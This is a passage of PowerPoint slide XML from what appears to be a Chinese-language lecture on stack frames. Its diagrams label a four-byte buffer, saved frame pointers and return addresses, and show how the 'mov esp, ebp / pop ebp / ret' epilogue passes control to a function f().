        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="40671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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61448" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="43719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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61449" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="46767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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61450" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="49815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61451" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="52863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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61452" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="55911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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61453" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62166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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61454" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="59118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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61455" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="25590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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61456" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="32908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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61457" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="48910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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61458" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5911850"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61459" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="61443" idx="3"/>
            <a:endCxn id="61448" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3016250"/>
            <a:ext cx="1588" cy="1508125"/>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61460" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="4357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461" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5881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462" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="2833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463" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6521450"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61464" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="61451" idx="3"/>
            <a:endCxn id="61452" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5438775"/>
            <a:ext cx="1588" cy="304800"/>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61465" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1752600"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61466" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="61465" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2247900"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61467" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="61468" idx="3"/>
            <a:endCxn id="61444" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4708525" y="3321050"/>
            <a:ext cx="320675" cy="158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1468" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="3138488"/>
            <a:ext cx="593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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61469" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="320675" y="2133600"/>
            <a:ext cx="593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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61470" name="AutoShape 30"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="609600" y="2514600"/>
            <a:ext cx="304800" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">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61471" name="AutoShape 31"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="61472" idx="3"/>
            <a:endCxn id="61448" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4724400" y="4524375"/>
            <a:ext cx="304800" cy="31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1472" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4130675" y="4343400"/>
            <a:ext cx="593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ebp</a:t>
            </a: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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42150808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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>get_buff()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="29400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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62468" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="32448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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62469" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="35496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62470" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="38385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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62471" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="41433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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62472" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="44481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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62473" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="47529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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62474" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="50577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62475" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="53625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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62476" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="56673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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62477" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62928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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62478" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="59880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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62479" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="26352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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62480" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="33670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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62481" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="49672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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62482" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5988050"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="62483" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="62467" idx="3"/>
            <a:endCxn id="62472" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3092450"/>
            <a:ext cx="1588" cy="1508125"/>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62484" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="44338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2485" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="59578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2486" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="29098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2487" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6597650"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="62488" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="62475" idx="3"/>
            <a:endCxn id="62476" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5514975"/>
            <a:ext cx="1588" cy="304800"/>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62489" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1828800"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="62490" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="62489" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2324100"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="62491" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="62492" idx="3"/>
            <a:endCxn id="62469" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4708525" y="3689350"/>
            <a:ext cx="320675" cy="127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2492" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="3505200"/>
            <a:ext cx="593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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="62493" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="62494" idx="3"/>
            <a:endCxn id="62472" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4724400" y="4600575"/>
            <a:ext cx="304800" cy="31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2494" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4130675" y="4419600"/>
            <a:ext cx="593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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62495" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="3200400"/>
            <a:ext cx="2133600" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 136162"/>
              <a:gd name="adj2" fmla="val -33463"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>指令转移控制到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>f()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37366651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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>f()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="29400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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63492" name="Rectangle 4"/>
